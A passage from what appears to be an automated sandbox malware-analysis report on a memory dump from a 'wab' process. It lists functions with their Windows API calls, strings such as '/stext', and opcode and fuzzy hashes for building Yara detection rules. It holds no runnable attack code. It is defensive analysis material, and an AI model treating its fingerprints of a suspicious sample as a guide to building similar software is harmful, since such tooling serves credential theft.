                                          • API String ID: 3831604043-0
                                          • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                          • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                          • GetLastError.KERNEL32 ref: 004175A2
                                          • GetLastError.KERNEL32 ref: 004175A8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                          • String ID:
                                          • API String ID: 1631957507-0
                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Temp$DirectoryFileNamePathWindows
                                          • String ID:
                                          • API String ID: 1125800050-0
                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                          Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                          • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: BINARY
                                          • API String ID: 2221118986-907554435
                                          • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                          • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                          Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                          • String ID:
                                          • API String ID: 1161345128-0
                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /stext
                                          • API String ID: 2081463915-3817206916
                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                          • String ID:
                                          • API String ID: 159017214-0
                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                          Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 3150196962-0
                                          • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                          • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                          Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: malloc
                                          • String ID: failed to allocate %u bytes of memory
                                          • API String ID: 2803490479-1168259600
                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                          Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmpmemset
                                          • String ID:
                                          • API String ID: 1065087418-0
                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                          Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                          • String ID:
                                          • API String ID: 1481295809-0
                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 3150196962-0
                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$PointerRead
                                          • String ID:
                                          • API String ID: 3154509469-0
                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                          • String ID:
                                          • API String ID: 4232544981-0
                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$FileModuleName
                                          • String ID:
                                          • API String ID: 3859505661-0
                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                          Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
